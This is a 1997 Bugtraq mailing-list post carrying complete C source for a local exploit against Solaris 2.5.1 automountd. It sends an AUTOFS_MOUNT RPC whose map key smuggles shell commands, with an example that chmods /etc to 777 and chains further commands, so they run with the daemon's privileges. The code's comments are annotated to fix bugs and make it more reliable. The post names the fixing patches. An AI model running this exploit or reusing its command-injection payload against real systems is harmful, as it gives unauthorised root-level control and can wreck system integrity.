
List:       bugtraq
Subject:    Solaris 2.5.1 automountd exploit (fwd)
From:       Aleph One <aleph1 () DFW ! NET>
Date:       1997-11-26 2:02:13

From anonymous:
--

/*
 This is a simple automountd exploit, tested on Solaris 2.5.1.
 Example: ./r blahblah /bin/chmod "777 /etc; 2nd cmd; 3rd cmd" and so on.
 automountd executes the map (here /bin/chmod) via popen() with the key
 appended as its argument, so shell metacharacters in the key run further
 commands as automountd; read automount(1M).

 Patches 104654 / 104655 fix this.

 */

#include <sys/types.h>
#include <sys/param.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

/*
 * Transport class passed as the nettype argument of clnt_create() in main().
 * In TI-RPC this is a netconfig nettype string, not a protocol name;
 * "datagram_v" selects the visible datagram (connectionless) transports.
 * The author's XXX marks it as unverified -- check netconfig(4) on the
 * target if clnt_create() fails.
 */
#define AUTOTS "datagram_v" /* XXX */

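/*
 * Print the command-line synopsis and terminate.
 *
 * s: argv[0], shown as the program name.
 *
 * This is only reached on a usage error, so the message goes to stderr and
 * the exit status is non-zero; the original wrote to stdout and returned 0,
 * which made a misuse indistinguishable from success to a calling script.
 * opts is optional.
 */
void usage(char *s) {
  fprintf(stderr, "Usage: %s mountpoint map key [opts]\n", s);
  exit(1);
}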

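/*
 * XDR routine for the AUTOFS_MOUNT argument (struct mntrequest).
 *
 * Encodes or decodes, in wire order, the four string members:
 *   name  - the map key        (at most A_MAXNAME bytes)
 *   map   - the map name       (at most A_MAXNAME bytes)
 *   opts  - mount options      (at most A_MAXOPTS bytes)
 *   path  - the mount point    (at most A_MAXPATH bytes)
 *
 * The length limits are the only check applied: xdr_string fails on a
 * string longer than its limit but passes the bytes through untouched, so
 * shell metacharacters in the key reach the server exactly as given.  On
 * encode a NULL member makes xdr_string fail, so callers must fill in all
 * four pointers.
 *
 * Returns TRUE on success, FALSE as soon as any member fails; the members
 * are processed in the order listed and later ones are not touched after
 * a failure.
 */
bool_t
xdr_mntrequest(XDR *xdrs, mntrequest *objp)
{
        return xdr_string(xdrs, &objp->name, A_MAXNAME)
            && xdr_string(xdrs, &objp->map, A_MAXNAME)
            && xdr_string(xdrs, &objp->opts, A_MAXOPTS)
            && xdr_string(xdrs, &objp->path, A_MAXPATH);
}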

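/*
 * XDR routine for the AUTOFS_MOUNT result (struct mntres).
 *
 * The result carries a single int, status, which main() prints without
 * interpreting it.
 *
 * Returns TRUE on success, FALSE if the int could not be (de)serialized.
 */
bool_t
xdr_mntres(XDR *xdrs, mntres *objp)
{
        return xdr_int(xdrs, &objp->status);
}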

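/*
 * Send one AUTOFS_MOUNT request to the automountd on this host.
 *
 *   argv[1] mountpoint -> req.path
 *   argv[2] map        -> req.map   (executed by the server via popen(),
 *                                    see the header comment)
 *   argv[3] key        -> req.name  (appended to that command line)
 *   argv[4] opts       -> req.opts  (optional; "" when omitted)
 *
 * Returns 0 when the RPC round-trip completed (the server's mntres status
 * is printed but not interpreted), 1 on a usage, gethostname(),
 * clnt_create() or clnt_call() failure.  The original returned 0 on every
 * error path, which hid failures from callers.
 */
int main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat rc;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result = {0};
  int status = 1;

  if (argc < 4)
    usage(argv[0]);

  req.path = argv[1];
  req.map = argv[2];
  req.name = argv[3];
  /*
   * argv[argc] is NULL, so with exactly three operands the original stored
   * a NULL opts pointer; xdr_string refuses to encode NULL and clnt_call
   * then fails with RPC_CANTENCODEARGS.  Send an empty option string when
   * opts is omitted, as the usage text promises.
   */
  req.opts = (argc > 4 && argv[4] != NULL) ? argv[4] : "";

  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    return 1;
  }
  /* gethostname() need not NUL-terminate a truncated name. */
  hostname[sizeof(hostname) - 1] = '\0';

  /* Bind to the local automountd over the AUTOTS transport class. */
  cl = clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS);
  if (cl == NULL) {
    clnt_pcreateerror("clnt_create");
    return 1;
  }

  tm.tv_sec = 5;
  tm.tv_usec = 0;
  rc = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest, (char *)&req,
                 (xdrproc_t)xdr_mntres, (char *)&result, tm);
  if (rc != RPC_SUCCESS) {
    clnt_perror(cl, "mount call");
  } else {
    printf("mntres = %d.\n", result.status);
    status = 0;
  }
  clnt_destroy(cl);
  return status;
}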

